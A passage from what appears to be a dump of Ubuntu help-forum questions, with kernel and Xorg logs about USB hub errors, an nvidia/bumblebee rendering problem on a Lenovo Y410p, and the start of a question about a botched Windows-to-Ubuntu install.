2-1.2:1.0 : hub_port_status failed ( err = -71 ) feb 5 19:46:45 snorkack kernel : [ 379209.362445 ] hub 2-1.2:1.0 : hub_port_status failed ( err = -71 ) feb 5 19:46:45 snorkack kernel : [ 379209.366669 ] hub 2-1.2:1.0 : hub_port_status failed ( err = -71 ) feb 5 19:46:45 snorkack kernel : [ 379209.377167 ] hub 2-1.2:1.0 : hub_port_status failed ( err = -71 ) feb 5 19:46:45 snorkack kernel : [ 379209.381414 ] hub 2-1.2:1.0 : hub_port_status failed ( err = -71 ) feb 5 19:46:45 snorkack kernel : [ 379209.391912 ] hub 2-1.2:1.0 : hub_port_status failed ( err = -71 ) feb 5 19:46:45 snorkack kernel : [ 379209.396153 ] hub 2-1.2:1.0 : hub_port_status failed ( err = -71 ) feb 5 19:46:45 snorkack kernel : [ 379209.406645 ] hub 2-1.2:1.0 : hub_port_status failed ( err = -71 ) feb 5 19:46:45 snorkack kernel : [ 379209.410894 ] hub 2-1.2:1.0 : hub_port_status failed ( err = -71 ) feb 5 19:46:45 snorkack kernel : [ 379209.421232 ] hub 2-1.2:1.0 : hub_port_status failed ( err = -71 ) feb 5 19:46:45 snorkack kernel : [ 379209.425477 ] hub 2-1.2:1.0 : hub_port_status failed ( err = -71 ) feb 5 19:46:45 snorkack kernel : [ 379209.435870 ] hub 2-1.2:1.0 : hub_port_status failed ( err = -71 ) feb 5 19:46:45 snorkack kernel : [ 379209.440118 ] hub 2-1.2:1.0 : hub_port_status failed ( err = -71 ) feb 5 19:46:45 snorkack kernel : [ 379209.450609 ] hub 2-1.2:1.0 : hub_port_status failed ( err = -71 ) feb 5 19:46:45 snorkack kernel : [ 379209.454860 ] hub 2-1.2:1.0 : hub_port_status failed ( err = -71 ) feb 5 19:46:45 snorkack kernel : [ 379209.465348 ] hub 2-1.2:1.0 : hub_port_status failed ( err = -71 ) feb 5 19:46:45 snorkack kernel : [ 379209.466820 ] usb 2-1.2 : usb disconnect , device number 44 feb 5 19:46:45 snorkack kernel : [ 379209.469596 ] hub 2-1.2:1.0 : hub_port_status failed ( err = -71 ) feb 5 19:46:45 snorkack kernel : [ 379209.469602 ] hub 2-1.2:1.0 : activate -- > -19 feb 5 19:46:46 snorkack kernel : [ 379209.671687 ] usb 2-1.2 : new high-speed usb device number 45 using ehci-pci feb 5 19:46:46 snorkack kernel : [ 379209.763862 ] usb 2-1.2 : new usb device found , idvendor=0424 , idproduct=2502 feb 5 19:46:46 snorkack kernel : [ 379209.763867 ] usb 2-1.2 : new usb device strings : mfr=0 , product=0 , serialnumber=0 feb 5 19:46:46 snorkack kernel : [ 379209.764150 ] hub 2-1.2:1.0 : usb hub found feb 5 19:46:46 snorkack kernel : [ 379209.764205 ] hub 2-1.2:1.0 : 2 ports detected feb 5 19:46:46 snorkack kernel : [ 379210.035385 ] usb 2-1.2.1 : new high-speed usb device number 46 using ehci-pci feb 5 19:46:46 snorkack kernel : [ 379210.127562 ] usb 2-1.2.1 : new usb device found , idvendor=0424 , idproduct=2504 feb 5 19:46:46 snorkack kernel : [ 379210.127567 ] usb 2-1.2.1 : new usb device strings : mfr=0 , product=0 , serialnumber=0 feb 5 19:46:46 snorkack kernel : [ 379210.127847 ] hub 2-1.2.1:1.0 : usb hub found feb 5 19:46:46 snorkack kernel : [ 379210.127904 ] hub 2-1.2.1:1.0 : 4 ports detected feb 5 19:46:46 snorkack kernel : [ 379210.215240 ] usb 2-1.2.2 : new high-speed usb device number 47 using ehci-pci feb 5 19:46:46 snorkack kernel : [ 379210.396718 ] usb 2-1.2.2 : new usb device found , idvendor=0424 , idproduct=223a feb 5 19:46:46 snorkack kernel : [ 379210.396723 ] usb 2-1.2.2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 feb 5 19:46:46 snorkack kernel : [ 379210.396726 ] usb 2-1.2.2 : product : usb2223 feb 5 19:46:46 snorkack kernel : [ 379210.396729 ] usb 2-1.2.2 : manufacturer : smsc feb 5 19:46:46 snorkack kernel : [ 379210.396732 ] usb 2-1.2.2 : serialnumber : 000223223223 feb 5 19:46:46 snorkack kernel : [ 379210.396995 ] usb-storage 2-1.2.2:1.0 : usb mass storage device detected feb 5 19:46:46 snorkack kernel : [ 379210.397199 ] scsi20 : usb-storage 2-1.2.2:1.0 feb 5 19:46:46 snorkack mtp-probe : checking bus 2 , device 47 : `` /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2.2 '' feb 5 19:46:46 snorkack mtp-probe : bus : 2 , device : 47 was not an mtp device feb 5 19:46:47 snorkack kernel : [ 379211.403444 ] scsi 20:0:0:0 : direct-access smsc 223 u hs-cf 3.60 pq : 0 ansi : 0 feb 5 19:46:47 snorkack kernel : [ 379211.406789 ] scsi 20:0:0:1 : direct-access smsc 223 u hs-ms 3.60 pq : 0 ansi : 0 feb 5 19:46:47 snorkack kernel : [ 379211.410181 ] scsi 20:0:0:2 : direct-access smsc 223 u hs-sm 3.60 pq : 0 ansi : 0 feb 5 19:46:47 snorkack kernel : [ 379211.413131 ] scsi 20:0:0:3 : direct-access smsc 223 u hs-sd/mmc 3.60 pq : 0 ansi : 0 feb 5 19:46:47 snorkack kernel : [ 379211.413520 ] sd 20:0:0:0 : attached scsi generic sg4 type 0 feb 5 19:46:47 snorkack kernel : [ 379211.413773 ] sd 20:0:0:1 : attached scsi generic sg6 type 0 feb 5 19:46:47 snorkack kernel : [ 379211.414004 ] sd 20:0:0:2 : attached scsi generic sg7 type 0 feb 5 19:46:47 snorkack kernel : [ 379211.414267 ] sd 20:0:0:3 : attached scsi generic sg8 type 0 feb 5 19:46:48 snorkack kernel : [ 379211.633165 ] sd 20:0:0:3 : [ sdg ] attached scsi removable disk feb 5 19:46:48 snorkack kernel : [ 379211.644220 ] sd 20:0:0:2 : [ sdf ] attached scsi removable disk feb 5 19:46:48 snorkack kernel : [ 379211.651224 ] sd 20:0:0:0 : [ sdc ] attached scsi removable disk feb 5 19:46:48 snorkack kernel : [ 379211.662540 ] sd 20:0:0:1 : [ sde ] attached scsi removable disk thank you for any insights .
417011	bumblebee with nvidia has wierd colors - lenovo y410p	when i run optirun -c yuv glmark2 it renders a wierd horse instead of the normal one , and it is off to the side . http : //i.stack.imgur.com/pfye8.png instead of http : //i.stack.imgur.com/au5oz.png lenovo y410p xorg.8.log [ 227.361 ] x.org x server 1.15.0 release date : 2013-12-27 [ 227.361 ] x protocol version 11 , revision 0 [ 227.361 ] build operating system : linux 3.2.0-37-generic x86_64 ubuntu [ 227.361 ] current operating system : linux io 3.13.0-7-generic # 25-ubuntu smp tue feb 4 10:19:12 utc 2014 x86_64 [ 227.361 ] kernel command line : boot_image=/boot/vmlinuz-3.13.0-7-generic.efi.signed root=uuid=5b9b1a5b-a812-4478-9e57-49679c2d4cfa ro acpi=force quiet splash vt.handoff=7 [ 227.361 ] build date : 04 february 2014 09:00:00pm [ 227.361 ] xorg-server 2:1.15.0-1ubuntu1 ( for technical support please see http : //www.ubuntu.com/support ) [ 227.361 ] current version of pixman : 0.30.2 [ 227.361 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 227.361 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 227.361 ] ( == ) log file : `` /var/log/xorg.8.log '' , time : wed feb 5 15:55:47 2014 [ 227.361 ] ( ++ ) using config file : `` /etc/bumblebee/xorg.conf.nvidia '' [ 227.361 ] ( ++ ) using config directory : `` /etc/bumblebee/xorg.conf.d '' [ 227.361 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 227.361 ] ( == ) serverlayout `` layout0 '' [ 227.361 ] ( ** ) | -- > screen `` default screen '' ( 0 ) [ 227.361 ] ( ** ) | | -- > monitor `` configured monitor '' [ 227.362 ] ( ** ) | | -- > device `` configured video device '' [ 227.362 ] ( ** ) option `` autoadddevices '' `` false '' [ 227.362 ] ( ** ) option `` autoaddgpu '' `` false '' [ 227.362 ] ( ** ) not automatically adding devices [ 227.362 ] ( == ) automatically enabling devices [ 227.362 ] ( ** ) not automatically adding gpu devices [ 227.362 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 227.362 ] entry deleted from font path . [ 227.362 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 227.362 ] entry deleted from font path . [ 227.362 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 227.362 ] entry deleted from font path . [ 227.362 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 227.362 ] entry deleted from font path . [ 227.362 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 227.362 ] entry deleted from font path . [ 227.362 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 227.362 ] ( ++ ) modulepath set to `` /usr/lib/nvidia-331/xorg , /usr/lib/xorg/modules '' [ 227.362 ] ( == ) | -- > input device `` < default pointer > '' [ 227.362 ] ( == ) | -- > input device `` < default keyboard > '' [ 227.362 ] ( == ) the core pointer device was n't specified explicitly in the layout . using the default mouse configuration . [ 227.362 ] ( == ) the core keyboard device was n't specified explicitly in the layout . using the default keyboard configuration . [ 227.362 ] ( ii ) loader magic : 0x7fe34e6c8d60 [ 227.362 ] ( ii ) module abi versions : [ 227.362 ] x.org ansi c emulation : 0.4 [ 227.362 ] x.org video driver : 15.0 [ 227.362 ] x.org xinput driver : 20.0 [ 227.362 ] x.org server extension : 8.0 [ 227.362 ] ( ii ) xfree86 : adding drm device ( /dev/dri/card1 ) [ 227.362 ] ( ii ) xfree86 : adding drm device ( /dev/dri/card0 ) [ 227.362 ] setversion 1.4 failed : permission denied [ 227.362 ] ( ii ) config/udev : ignoring already known drm device ( /dev/dri/card0 ) [ 227.363 ] ( -- ) pci : * ( 0:1:0:0 ) 10de:0fcd:17aa:3801 rev 161 , mem @ 0xc0000000/16777216 , 0x90000000/268435456 , 0xa0000000/33554432 , i/o @ 0x00004000/128 , bios @ 0x ? ? ? ? ? ? ? ? /524288 [ 227.363 ] initializing built-in extension generic event extension [ 227.363 ] initializing built-in extension shape [ 227.363 ] initializing built-in extension mit-shm [ 227.363 ] initializing built-in extension xinputextension [ 227.363 ] initializing built-in extension xtest [ 227.363 ] initializing built-in extension big-requests [ 227.363 ] initializing built-in extension sync [ 227.363 ] initializing built-in extension xkeyboard [ 227.363 ] initializing built-in extension xc-misc [ 227.363 ] initializing built-in extension security [ 227.363 ] initializing built-in extension xinerama [ 227.363 ] initializing built-in extension xfixes [ 227.363 ] initializing built-in extension render [ 227.363 ] initializing built-in extension randr [ 227.363 ] initializing built-in extension composite [ 227.363 ] initializing built-in extension damage [ 227.363 ] initializing built-in extension mit-screen-saver [ 227.363 ] initializing built-in extension double-buffer [ 227.363 ] initializing built-in extension record [ 227.363 ] initializing built-in extension dpms [ 227.363 ] initializing built-in extension present [ 227.363 ] initializing built-in extension dri3 [ 227.363 ] initializing built-in extension x-resource [ 227.363 ] initializing built-in extension xvideo [ 227.363 ] initializing built-in extension xvideo-motioncompensation [ 227.363 ] initializing built-in extension selinux [ 227.363 ] initializing built-in extension xfree86-vidmodeextension [ 227.363 ] initializing built-in extension xfree86-dga [ 227.363 ] initializing built-in extension xfree86-dri [ 227.363 ] initializing built-in extension dri2 [ 227.363 ] ( ww ) `` glamoregl '' will not be loaded unless you 've specified it to be loaded elsewhere . [ 227.363 ] ( ii ) `` glx '' will be loaded by default . [ 227.363 ] ( ww ) `` xmir '' is not to be loaded by default . skipping . [ 227.363 ] ( ii ) loadmodule : `` glx '' [ 227.363 ] ( ii ) loading /usr/lib/nvidia-331/xorg/libglx.so [ 227.372 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 227.372 ] compiled for 4.0.2 , module version = 1.0.0 [ 227.372 ] module class : x.org server extension [ 227.372 ] ( ii ) nvidia glx module 331.38 wed jan 8 19:10:17 pst 2014 [ 227.373 ] loading extension glx [ 227.373 ] ( == ) matched nvidia as autoconfigured driver 0 [ 227.373 ] ( == ) matched nouveau as autoconfigured driver 1 [ 227.373 ] ( == ) matched nvidia as autoconfigured driver 2 [ 227.373 ] ( == ) matched nouveau as autoconfigured driver 3 [ 227.373 ] ( == ) matched modesetting as autoconfigured driver 4 [ 227.373 ] ( == ) matched fbdev as autoconfigured driver 5 [ 227.373 ] ( == ) matched vesa as autoconfigured driver 6 [ 227.373 ] ( == ) assigned the driver to the xf86configlayout [ 227.373 ] ( ii ) loadmodule : `` nvidia '' [ 227.373 ] ( ii ) loading /usr/lib/nvidia-331/xorg/nvidia_drv.so [ 227.373 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 227.373 ] compiled for 4.0.2 , module version = 1.0.0 [ 227.373 ] module class : x.org video driver [ 227.373 ] ( ii ) loadmodule : `` nouveau '' [ 227.373 ] ( ii ) loading /usr/lib/xorg/modules/drivers/nouveau_drv.so [ 227.373 ] ( ii ) module nouveau : vendor= '' x.org foundation '' [ 227.373 ] compiled for 1.15.0 , module version = 1.0.10 [ 227.373 ] module class : x.org video driver [ 227.373 ] abi class : x.org video driver , version 15.0 [ 227.373 ] ( ii ) loadmodule : `` modesetting '' [ 227.373 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 227.373 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 227.373 ] compiled for 1.15.0 , module version = 0.8.1 [ 227.373 ] module class : x.org video driver [ 227.373 ] abi class : x.org video driver , version 15.0 [ 227.373 ] ( ii ) loadmodule : `` fbdev '' [ 227.373 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 227.374 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 227.374 ] compiled for 1.15.0 , module version = 0.4.4 [ 227.374 ] module class : x.org video driver [ 227.374 ] abi class : x.org video driver , version 15.0 [ 227.374 ] ( ii ) loadmodule : `` vesa '' [ 227.374 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 227.374 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 227.374 ] compiled for 1.15.0 , module version = 2.3.3 [ 227.374 ] module class : x.org video driver [ 227.374 ] abi class : x.org video driver , version 15.0 [ 227.374 ] ( ii ) loadmodule : `` mouse '' [ 227.374 ] ( ii ) loading /usr/lib/xorg/modules/input/mouse_drv.so [ 227.374 ] ( ii ) module mouse : vendor= '' x.org foundation '' [ 227.374 ] compiled for 1.15.0 , module version = 1.9.0 [ 227.374 ] module class : x.org xinput driver [ 227.374 ] abi class : x.org xinput driver , version 20.0 [ 227.374 ] ( ii ) loadmodule : `` kbd '' [ 227.374 ] ( ww ) warning , could n't open module kbd [ 227.374 ] ( ii ) unloadmodule : `` kbd '' [ 227.374 ] ( ii ) unloading kbd [ 227.374 ] ( ee ) failed to load module `` kbd '' ( module does not exist , 0 ) [ 227.374 ] ( ii ) nvidia dlloader x driver 331.38 wed jan 8 18:51:00 pst 2014 [ 227.374 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 227.374 ] ( ii ) nouveau driver date : thu nov 7 14:56:48 2013 +1000 [ 227.374 ] ( ii ) nouveau driver for nvidia chipset families : [ 227.374 ] riva tnt ( nv04 ) [ 227.374 ] riva tnt2 ( nv05 ) [ 227.374 ] geforce 256 ( nv10 ) [ 227.374 ] geforce 2 ( nv11 , nv15 ) [ 227.374 ] geforce 4mx ( nv17 , nv18 ) [ 227.374 ] geforce 3 ( nv20 ) [ 227.374 ] geforce 4ti ( nv25 , nv28 ) [ 227.374 ] geforce fx ( nv3x ) [ 227.374 ] geforce 6 ( nv4x ) [ 227.374 ] geforce 7 ( g7x ) [ 227.374 ] geforce 8 ( g8x ) [ 227.374 ] geforce gtx 200 ( nva0 ) [ 227.374 ] geforce gtx 400 ( nvc0 ) [ 227.374 ] ( ii ) modesetting : driver for modesetting kernel drivers : kms [ 227.374 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 227.374 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 227.374 ] ( -- ) using vt number 7 [ 227.374 ] ( ii ) loading sub module `` fb '' [ 227.374 ] ( ii ) loadmodule : `` fb '' [ 227.375 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 227.375 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 227.375 ] compiled for 1.15.0 , module version = 1.0.0 [ 227.375 ] abi class : x.org ansi c emulation , version 0.4 [ 227.375 ] ( ww ) unresolved symbol : fbgetgcprivatekey [ 227.375 ] ( ii ) loading sub module `` wfb '' [ 227.375 ] ( ii ) loadmodule : `` wfb '' [ 227.375 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 227.375 ] ( ii ) module wfb : vendor= '' x.org foundation '' [ 227.375 ] compiled for 1.15.0 , module version = 1.0.0 [ 227.375 ] abi class : x.org ansi c emulation , version 0.4 [ 227.375 ] ( ii ) loading sub module `` ramdac '' [ 227.375 ] ( ii ) loadmodule : `` ramdac '' [ 227.375 ] ( ii ) module `` ramdac '' already built-in [ 227.375 ] ( ww ) falling back to old probe method for modesetting [ 227.375 ] ( ww ) falling back to old probe method for fbdev [ 227.375 ] ( ii ) loading sub module `` fbdevhw '' [ 227.375 ] ( ii ) loadmodule : `` fbdevhw '' [ 227.375 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 227.375 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 227.375 ] compiled for 1.15.0 , module version = 0.0.2 [ 227.375 ] abi class : x.org video driver , version 15.0 [ 227.375 ] ( ww ) falling back to old probe method for vesa [ 227.375 ] ( ii ) nvidia ( 0 ) : creating default display subsection in screen section `` default screen '' for depth/fbbpp 24/32 [ 227.375 ] ( == ) nvidia ( 0 ) : depth 24 , ( == ) framebuffer bpp 32 [ 227.375 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 227.375 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 227.375 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 227.375 ] ( ** ) nvidia ( 0 ) : enabling 2d acceleration [ 227.486 ] ( ii ) nvidia ( gpu-0 ) : found drm driver nvidia-drm ( 20130102 ) [ 227.487 ] ( ii ) nvidia ( 0 ) : nvidia gpu geforce gt 755m ( gk107 ) at pci:1:0:0 ( gpu-0 ) [ 227.487 ] ( -- ) nvidia ( 0 ) : memory : 2097152 kbytes [ 227.487 ] ( -- ) nvidia ( 0 ) : videobios : 80.07.a8.00.0f [ 227.487 ] ( ii ) nvidia ( 0 ) : detected pci express link width : 16x [ 227.487 ] ( -- ) nvidia ( 0 ) : valid display device ( s ) on geforce gt 755m at pci:1:0:0 [ 227.487 ] ( -- ) nvidia ( 0 ) : none [ 227.487 ] ( ii ) nvidia ( 0 ) : validated metamodes : [ 227.487 ] ( ii ) nvidia ( 0 ) : `` null '' [ 227.487 ] ( ii ) nvidia ( 0 ) : virtual screen size determined to be 640 x 480 [ 227.487 ] ( ww ) nvidia ( 0 ) : unable to get display device for dpi computation . [ 227.487 ] ( == ) nvidia ( 0 ) : dpi set to ( 75 , 75 ) ; computed from built-in default [ 227.487 ] ( ii ) unloadmodule : `` nouveau '' [ 227.487 ] ( ii ) unloading nouveau [ 227.487 ] ( ii ) unloadmodule : `` modesetting '' [ 227.487 ] ( ii ) unloading modesetting [ 227.487 ] ( ii ) unloadmodule : `` fbdev '' [ 227.487 ] ( ii ) unloading fbdev [ 227.487 ] ( ii ) unloadsubmodule : `` fbdevhw '' [ 227.487 ] ( ii ) unloading fbdevhw [ 227.487 ] ( ii ) unloadmodule : `` vesa '' [ 227.487 ] ( ii ) unloading vesa [ 227.487 ] ( -- ) depth 24 pixmap format is 32 bpp [ 227.487 ] ( ii ) nvidia : using 3072.00 mb of virtual memory for indirect memory [ 227.487 ] ( ii ) nvidia : access . [ 227.490 ] ( ii ) nvidia ( 0 ) : setting mode `` null '' [ 227.490 ] ( ee ) nvidia ( 0 ) : failed to initiate mode change . [ 227.490 ] ( ee ) nvidia ( 0 ) : failed to complete mode change [ 227.498 ] ( ii ) nvidia ( 0 ) : built-in logo is bigger than the screen . [ 227.498 ] loading extension nv-glx [ 227.501 ] ( == ) nvidia ( 0 ) : disabling shared memory pixmaps [ 227.501 ] ( == ) nvidia ( 0 ) : backing store enabled [ 227.501 ] ( == ) nvidia ( 0 ) : silken mouse enabled [ 227.501 ] ( == ) nvidia ( 0 ) : dpms enabled [ 227.501 ] loading extension nv-control [ 227.501 ] ( ii ) loading sub module `` dri2 '' [ 227.501 ] ( ii ) loadmodule : `` dri2 '' [ 227.501 ] ( ii ) module `` dri2 '' already built-in [ 227.501 ] ( ii ) nvidia ( 0 ) : [ dri2 ] setup complete [ 227.501 ] ( ii ) nvidia ( 0 ) : [ dri2 ] vdpau driver : nvidia [ 227.501 ] ( -- ) randr disabled [ 227.504 ] ( ii ) selinux : disabled on system [ 227.504 ] ( ii ) initializing extension glx [ 227.513 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-02d8252e59564a234380f1e5417646a9db3b7452.xkm [ 227.513 ] ( ii ) using input driver 'mouse ' for ' < default pointer > ' [ 227.513 ] ( ** ) option `` corepointer '' `` on '' [ 227.513 ] ( ** ) < default pointer > : always reports core events [ 227.514 ] ( ww ) < default pointer > : no device specified , looking for one ... [ 227.536 ] ( ii ) < default pointer > : setting device option to `` /dev/input/mice '' [ 227.536 ] ( -- ) < default pointer > : device : `` /dev/input/mice '' [ 227.536 ] ( == ) < default pointer > : protocol : `` auto '' [ 227.536 ] ( ** ) < default pointer > : always reports core events [ 227.536 ] ( ** ) option `` device '' `` /dev/input/mice '' [ 227.564 ] ( == ) < default pointer > : emulate3buttons , emulate3timeout : 50 [ 227.564 ] ( ** ) < default pointer > : zaxismapping : buttons 4 and 5 [ 227.564 ] ( ** ) < default pointer > : buttons : 9 [ 227.564 ] ( ii ) xinput : adding extended input device `` < default pointer > '' ( type : mouse , id 6 ) [ 227.564 ] ( ** ) < default pointer > : ( accel ) keeping acceleration scheme 1 [ 227.564 ] ( ** ) < default pointer > : ( accel ) acceleration profile 0 [ 227.564 ] ( ** ) < default pointer > : ( accel ) acceleration factor : 2.000 [ 227.564 ] ( ** ) < default pointer > : ( accel ) acceleration threshold : 4 [ 227.564 ] ( ii ) < default pointer > : setting mouse protocol to `` explorerps/2 '' [ 227.857 ] ( ii ) < default pointer > : ps2enabledatareporting : succeeded [ 227.857 ] ( ii ) loadmodule : `` kbd '' [ 227.858 ] ( ww ) warning , could n't open module kbd [ 227.858 ] ( ii ) unloadmodule : `` kbd '' [ 227.858 ] ( ii ) unloading kbd [ 227.858 ] ( ee ) failed to load module `` kbd '' ( module does not exist , 0 ) [ 227.858 ] ( ee ) no input driver matching `kbd' [ 227.862 ] ( ii ) config/udev : adding input device power button ( /dev/input/event3 ) [ 227.862 ] ( ii ) autoadddevices is off - not adding device . [ 227.862 ] ( ii ) config/udev : adding input device video bus ( /dev/input/event9 ) [ 227.862 ] ( ii ) autoadddevices is off - not adding device . [ 227.862 ] ( ii ) config/udev : adding input device power button ( /dev/input/event0 ) [ 227.863 ] ( ii ) autoadddevices is off - not adding device . [ 227.863 ] ( ii ) config/udev : adding input device sleep button ( /dev/input/event1 ) [ 227.863 ] ( ii ) autoadddevices is off - not adding device . [ 227.863 ] ( ii ) config/udev : adding input device video bus ( /dev/input/event8 ) [ 227.863 ] ( ii ) autoadddevices is off - not adding device . [ 227.864 ] ( ii ) config/udev : adding input device lid switch ( /dev/input/event2 ) [ 227.864 ] ( ii ) autoadddevices is off - not adding device . [ 227.864 ] ( ii ) config/udev : adding drm device ( /dev/dri/card1 ) [ 227.864 ] ( ii ) config/udev : ignoring already known drm device ( /dev/dri/card1 ) [ 227.864 ] ( ii ) config/udev : adding drm device ( /dev/dri/card0 ) [ 227.864 ] ( ii ) xfree86 : adding drm device ( /dev/dri/card0 ) [ 227.864 ] setversion 1.4 failed : permission denied [ 227.864 ] ( ii ) config/udev : ignoring already known drm device ( /dev/dri/card0 ) [ 227.865 ] ( ii ) config/udev : adding input device hda intel hdmi hdmi/dp , pcm=3 ( /dev/input/event12 ) [ 227.865 ] ( ii ) autoadddevices is off - not adding device . [ 227.865 ] ( ii ) config/udev : adding input device hda intel hdmi hdmi/dp , pcm=7 ( /dev/input/event11 ) [ 227.865 ] ( ii ) autoadddevices is off - not adding device . [ 227.866 ] ( ii ) config/udev : adding input device hda intel hdmi hdmi/dp , pcm=8 ( /dev/input/event10 ) [ 227.866 ] ( ii ) autoadddevices is off - not adding device . [ 227.866 ] ( ii ) config/udev : adding input device lenovo easycamera ( /dev/input/event7 ) [ 227.866 ] ( ii ) autoadddevices is off - not adding device . [ 227.867 ] ( ii ) config/udev : adding input device logitech unifying device . wireless pid:101d ( /dev/input/event15 ) [ 227.867 ] ( ii ) autoadddevices is off - not adding device . [ 227.867 ] ( ii ) config/udev : adding input device logitech unifying device . wireless pid:101d ( /dev/input/mouse1 ) [ 227.867 ] ( ii ) autoadddevices is off - not adding device . [ 227.867 ] ( ii ) config/udev : adding input device hda intel pch mic ( /dev/input/event14 ) [ 227.867 ] ( ii ) autoadddevices is off - not adding device . [ 227.868 ] ( ii ) config/udev : adding input device hda intel pch headphone ( /dev/input/event13 ) [ 227.868 ] ( ii ) autoadddevices is off - not adding device . [ 227.868 ] ( ii ) config/udev : adding input device ideapad extra buttons ( /dev/input/event5 ) [ 227.868 ] ( ii ) autoadddevices is off - not adding device . [ 227.869 ] ( ii ) config/udev : adding input device at translated set 2 keyboard ( /dev/input/event4 ) [ 227.869 ] ( ii ) autoadddevices is off - not adding device . [ 227.869 ] ( ii ) config/udev : adding input device etps/2 elantech touchpad ( /dev/input/event6 ) [ 227.869 ] ( ii ) autoadddevices is off - not adding device . [ 227.870 ] ( ii ) config/udev : adding input device etps/2 elantech touchpad ( /dev/input/mouse0 ) [ 227.870 ] ( ii ) autoadddevices is off - not adding device . [ 253.005 ] ( ii ) unloadmodule : `` mouse '' [ 253.031 ] ( ii ) nvidia ( gpu-0 ) : deleting gpu-0 [ 253.031 ] ( ee ) server terminated successfully ( 0 ) . closing log file . kern.log ( part ) feb 5 15:53:17 io kernel : [ 77.660161 ] nvidia : module license 'nvidia ' taints kernel . feb 5 15:53:17 io kernel : [ 77.660165 ] disabling lock debugging due to kernel taint feb 5 15:53:17 io kernel : [ 77.664094 ] nvidia : module verification failed : signature and/or required key missing - tainting kernel feb 5 15:53:17 io kernel : [ 77.667334 ] nvidia 0000:01:00.0 : enabling device ( 0006 - > 0007 ) feb 5 15:53:17 io kernel : [ 77.667385 ] vgaarb : device changed decodes : pci:0000:01:00.0 , olddecodes=io+mem , decodes=none : owns=none feb 5 15:53:17 io kernel : [ 77.667490 ] [ drm ] initialized nvidia-drm 0.0.0 20130102 for 0000:01:00.0 on minor 1 feb 5 15:53:17 io kernel : [ 77.667494 ] nvrm : loading nvidia unix x86_64 kernel module 331.38 wed jan 8 19:32:30 pst 2014 feb 5 15:53:20 io kernel : [ 80.697401 ] nvidia 0000:01:00.0 : irq 51 for msi/msi-x feb 5 15:53:20 io kernel : [ 80.702917 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20131115/nsarguments-95 ) feb 5 15:53:20 io kernel : [ 80.702946 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20131115/nsarguments-95 ) feb 5 15:53:20 io kernel : [ 80.702958 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20131115/nsarguments-95 ) feb 5 15:53:20 io kernel : [ 80.702977 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20131115/nsarguments-95 ) feb 5 15:53:20 io kernel : [ 80.702989 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20131115/nsarguments-95 ) feb 5 15:53:20 io kernel : [ 80.703000 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20131115/nsarguments-95 ) feb 5 15:53:20 io kernel : [ 80.703034 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20131115/nsarguments-95 ) feb 5 15:53:20 io kernel : [ 80.703046 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20131115/nsarguments-95 ) feb 5 15:53:21 io kernel : [ 81.999403 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20131115/nsarguments-95 ) never mind it works now
417012	ubuntu 13.10 killed my desktop computer !	i need help . i have an hp pavilion g7 and i was wondering how to fix it . what happened was it originally came with windows 7 , and i upgraded to 8 , but today i decided to make the switch from windows to ubuntu , so i partitioned my hard disk , and backed up everything to one partition , which i do n't wan na delete because it contains my backups , and partitioned again . i also kept note , luckilly , of how much free space windows 8 had . and when i booted to ubuntu , i gave all of the free space to swap and i deleted the windows partition ( note : i left the system partition there , that was there maybe after upgrade to 8 . ) then , i installed ubuntu where windows was originally . it completed install , and i reboot it , then get a suspisious black screen , so i power off the pc , and power it back on , i then get a light-blue ( like the color of the sky ) screen with white text , it says something like this : 